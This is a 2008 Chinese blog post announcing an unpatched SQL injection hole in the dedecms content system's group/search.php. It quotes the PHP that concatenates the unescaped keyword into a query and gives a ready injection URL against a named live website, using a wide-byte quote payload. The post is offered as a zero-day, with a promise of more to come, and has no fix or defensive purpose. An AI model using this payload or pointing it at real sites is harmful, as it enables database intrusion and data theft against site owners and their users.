数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



dedecms 注入漏洞 0day
樱木花盗 发表于 2008-8-27 14:29:22

漏洞发者:落叶纷飞

dedecms漏洞还有几个 打算每天发布一个了

-----------------------------------------------------------------------------

注射group/search.php

................................................................................................

if(empty($sad)) $sad = "t";
if(empty($keyword)){
 ShowMsg("错误,请输入搜索关键字!","-1");
 exit();
}
if($sad=="g"){
 $searchtable = "#@__groups";
 $WhereSql = "WHERE ishidden=0 AND groupname like '%".$keyword."%'";
 $Orders = "ORDER BY stime DESC";
}else{
 $searchtable = "#@__group_threads";
 $WhereSql = "WHERE closed=0 AND subject like '%".$keyword."%'";
 $Orders = "ORDER BY lastpost DESC";
}

..............................................................................................


http://www.03389.com/dg/group/search.php?sad=g&keyword=%cf'


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.